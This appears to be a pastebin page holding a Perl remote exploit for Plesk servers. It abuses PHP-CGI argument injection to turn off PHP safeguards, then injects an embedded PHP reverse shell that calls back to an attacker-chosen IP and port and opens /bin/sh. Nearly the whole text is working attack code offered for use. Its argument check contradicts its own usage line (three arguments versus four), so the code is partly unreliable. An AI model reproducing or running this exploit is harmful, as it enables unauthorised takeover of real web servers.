SHOW:
|
|
- or go back to the newest paste.
| 1 | #plesk remote exploit by kingcope | |
| 2 | #vaguely prettified by some guy | |
| 3 | #all your base belongs to me :> | |
| 4 | ||
| 5 | use strict; | |
| 6 | use warnings; | |
| 7 | use IO::Socket; | |
| 8 | use IO::Socket::SSL; | |
| 9 | use URI::Escape; | |
| 10 | ||
| 11 | sub usage {
| |
| 12 | print "usage: $0 <target> <http/https> <local_ip> <local_port>\n";exit; | |
| 13 | } | |
| 14 | ||
| 15 | my ($target,$proto,$lip,$lport) = @ARGV; | |
| 16 | my $sock; | |
| 17 | if ($proto eq "http") {
| |
| 18 | $sock = IO::Socket::INET->new( | |
| 19 | PeerAddr => $target, | |
| 20 | PeerPort => 80, | |
| 21 | Proto => 'tcp'); | |
| 22 | } | |
| 23 | elsif ($proto eq "https") {
| |
| 24 | $sock = IO::Socket::SSL->new( | |
| 25 | PeerAddr => $target, | |
| 26 | PeerPort => 443, | |
| 27 | Proto => 'tcp'); | |
| 28 | } | |
| 29 | else {
| |
| 30 | &usage(); | |
| 31 | } | |
| 32 | ||
| 33 | sub main {
| |
| 34 | my $pwn="<?php echo \"Content-Type: text/plain\r\n\r\n\";set_time_limit (0); \$VERSION = \"1.0\"; \$ip = | |
| 35 | '$lip'; \$port = $lport; \$chunk_size = 1400; \$write_a = null; | |
| 36 | \$error_a = null; \$shell = '/bin/sh -i'; \$daemon = | |
| 37 | 0;\$debug = 0; if (function_exists('pcntl_fork')) { \$pid =
| |
| 38 | pcntl_fork(); if (\$pid == -1) { printit(\"ERROR: Can't fork\");
| |
| 39 | exit(1);} if (\$pid) { exit(0);} if (posix_setsid() == -1) {
| |
| 40 | printit(\"Error: Can't setsid()\"); exit(1); } \$daemon = 1;} else {
| |
| 41 | printit(\"WARNING: Failed to daemonise. This is quite common and not | |
| 42 | fatal.\");}chdir(\"/\"); umask(0); \$sock = fsockopen(\$ip, \$port, | |
| 43 | \$errno, \$errstr, 30);if (!\$sock) { printit(\"\$errstr (\$errno)\");
| |
| 44 | exit(1);} \$descriptorspec = array(0 => array(\"pipe\", \"r\"),1 => | |
| 45 | array(\"pipe\", \"w\"), 2 => array(\"pipe\", \"w\"));\$process = | |
| 46 | proc_open(\$shell, \$descriptorspec, \$pipes);if | |
| 47 | (!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\");
| |
| 48 | exit(1);}stream_set_blocking(\$pipes[0], | |
| 49 | 0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2], | |
| 50 | 0);stream_set_blocking(\$sock, 0);while (1) { if (feof(\$sock)) {
| |
| 51 | printit(\"done.\"); break;} if | |
| 52 | (feof(\$pipes[1])) {printit(\"done.\");break;}\$read_a = array(\$sock, \$pipes[1],
| |
| 53 | \$pipes[2]);\$num_changed_sockets = stream_select(\$read_a, \$write_a, | |
| 54 | \$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug)
| |
| 55 | printit(\"SOCK READ\");\$input = fread(\$sock, | |
| 56 | \$chunk_size);if(\$debug) printit(\"SOCK: | |
| 57 | \$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1], | |
| 58 | \$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input =
| |
| 59 | fread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT: | |
| 60 | \$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2], | |
| 61 | \$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input =
| |
| 62 | fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR: | |
| 63 | \$input\");fwrite(\$sock, | |
| 64 | \$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pipes[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {print
| |
| 65 | \"\$string\n\";}} | |
| 66 | ?>"; | |
| 67 | my $arguments = uri_escape("-d","\0-\377"). "+" .
| |
| 68 | uri_escape("allow_url_include=on","\0-\377"). "+" .
| |
| 69 | uri_escape("-d","\0-\377"). "+" .
| |
| 70 | uri_escape("safe_mode=off","\0-\377"). "+" .
| |
| 71 | uri_escape("-d","\0-\377"). "+" .
| |
| 72 | uri_escape("suhosin.simulation=on","\0-\377"). "+" .
| |
| 73 | uri_escape("-d","\0-\377"). "+" .
| |
| 74 | uri_escape("disable_functions=\"\"","\0-\377"). "+" .
| |
| 75 | uri_escape("-d","\0-\377"). "+" .
| |
| 76 | uri_escape("open_basedir=none","\0-\377"). "+" .
| |
| 77 | uri_escape("-d","\0-\377"). "+" .
| |
| 78 | uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
| |
| 79 | uri_escape("-n","\0-\377");
| |
| 80 | my $path=uri_escape("phppath","\0-\377"). "/" . uri_escape("php","\0-\377");
| |
| 81 | print $sock "POST /$path?$arguments HTTP/1.1\r\n". | |
| 82 | "Host: $ARGV[0]\r\n". | |
| 83 | "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n". | |
| 84 | "Content-Type: text/plain\r\n". | |
| 85 | "Content-Length: ". length($pwn) ."\r\n\r\n". $pwn; | |
| 86 | while(<$sock>){
| |
| 87 | print $_; | |
| 88 | }; | |
| 89 | } | |
| 90 | ||
| 91 | #arguably here is the actual main but yeah | |
| 92 | if (@ARGV != 3){
| |
| 93 | &usage(); | |
| 94 | } | |
| 95 | else {
| |
| 96 | &main(); | |
| 97 | exit(); | |
| 98 | } |
